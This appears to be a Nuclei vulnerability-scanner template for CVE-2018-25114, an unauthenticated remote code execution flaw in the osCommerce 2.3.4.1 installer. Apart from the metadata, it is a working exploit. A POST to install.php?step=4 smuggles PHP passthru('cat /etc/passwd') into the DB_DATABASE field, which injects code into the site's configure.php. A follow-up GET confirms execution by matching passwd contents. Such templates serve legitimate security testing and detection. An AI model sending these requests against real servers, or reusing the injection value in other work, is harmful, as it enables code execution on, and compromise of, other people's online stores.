id: CVE-2018-25114
info:
name: osCommerce 2.3.4.1 - Remote Code Execution
author: Suman_Kar
severity: critical
description: |
osCommerce Online Merchant 2.3.4.1 contains a remote code execution caused by insecure default configuration and missing authentication in the installer workflow, letting unauthenticated attackers execute arbitrary PHP code via install_4.php, exploit requires accessible /install/ directory after installation.
reference:
- https://www.exploit-db.com/exploits/50128
- https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
- https://www.exploit-db.com/exploits/44374
- https://www.vulncheck.com/advisories/oscommerce-installer-unauth-config-file-injection-php-code-execution
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
cve-id: CVE-2018-25114
cwe-id: CWE-94
epss-score: 0.85783
epss-percentile: 0.99332
metadata:
verified: true
max-request: 2
tags: cve,cve2018,rce,oscommerce,edb,vuln,vkev
http:
- raw:
- |
POST /install/install.php?step=4 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
- |
GET /install/includes/configure.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# digest: 4a0a00473045022100f5c468da49f8bb8a8638a27ed5c638999b43c1adec07299f880a78309254010f022039319df860602274d9df8ee048a632fd482644233732a4cf0a9a88e8eb9d6ead:922c64590222798bb761d5b6d8e72950